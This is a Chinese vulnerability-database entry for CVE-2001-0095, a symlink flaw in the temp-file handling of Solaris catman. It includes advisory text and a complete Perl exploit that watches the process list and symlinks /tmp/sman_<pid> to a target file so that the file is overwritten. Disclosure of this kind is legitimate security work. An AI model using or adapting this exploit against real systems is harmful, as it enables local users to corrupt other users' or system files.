Solaris catman覆盖文件漏洞

Solaris catman覆盖文件漏洞

漏洞ID 1106091 漏洞类型 未知
发布时间 2000-11-21 更新时间 2005-05-02
图片[1]-Solaris catman覆盖文件漏洞-安全小百科CVE编号 CVE-2001-0095
图片[2]-Solaris catman覆盖文件漏洞-安全小百科CNNVD-ID CNNVD-200102-018
漏洞平台 Solaris CVSS评分 1.2
|漏洞来源
https://www.exploit-db.com/exploits/20521
https://cxsecurity.com/issue/WLB-2018090258
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200102-018
|漏洞详情
Solaris2.7和2.8版本的catman存在漏洞。本地用户可以借助sman_PID临时文件的符号链接攻击覆盖任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/2149/info
 
catman is a utility for creating preformatted man pages, distributed as part of the Solaris Operating Environment. A problem exists which could allow local users to overwrite or corrupt files owned by other users.
 
The problem occurs in the creation of temporary files by the catman program. Upon execution, catman creates files in the /tmp directory using the file name sman_<pid>, where pid is the Process ID of the running catman process. The creation of a symbolic link from /tmp/sman_<pid> to a file owned and writable by the user executing catman will result in the file being overwritten, or in the case of a system file, corrupted. This makes it possible for a user with malicious intent to overwrite or corrupt files owned by other users, and potentially overwrite or corrupt system files. The Sun BugID for this issue is 4392144. 

#!/usr/local/bin/perl -w 
# The problem is catman creates files in /tmp insecurly. They are based on the PID of the catman
# process,  catman will happily clobber any files that are symlinked to that file.
# The idea of this script is to watch the process list for the catman process, 
# get the pid and Create a symlink in /tmp to our file to be
# clobbered.  This exploit depends on system speed and process load.   
# This worked on a patched Solaris 2.7 box (August 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-1
# [email protected]   11/21/2000   Vapid Labs.
# http://vapid.betteros.org



$clobber = "/etc/pass";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";

while(<ps>) {
@args = split " ", $_;

if (/catman/) { 
        print "Symlinking sman_$args[1] to  $clobbern";
        symlink($clobber,"/tmp/sman_$args[1]");
        exit(1);
   }
 }

}
|参考资料

来源:XF
名称:solaris-catman-symlink(5788)
链接:http://xforce.iss.net/static/5788.php
来源:BUGTRAQ
名称:20001218CatmanfileclobberingvulnerabilitySolaris2.x
链接:http://archives.neohapsis.com/archives/bugtraq/2000-12/0313.html
来源:OSVDB
名称:6024
链接:http://www.osvdb.org/6024

相关推荐: FreeScripts VisitorBook LE (visitorbook.pl)跨站脚本(XSS)漏洞

FreeScripts VisitorBook LE (visitorbook.pl)跨站脚本(XSS)漏洞 漏洞ID 1202097 漏洞类型 跨站脚本 发布时间 2004-01-05 更新时间 2004-01-05 CVE编号 CVE-2003-0980 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享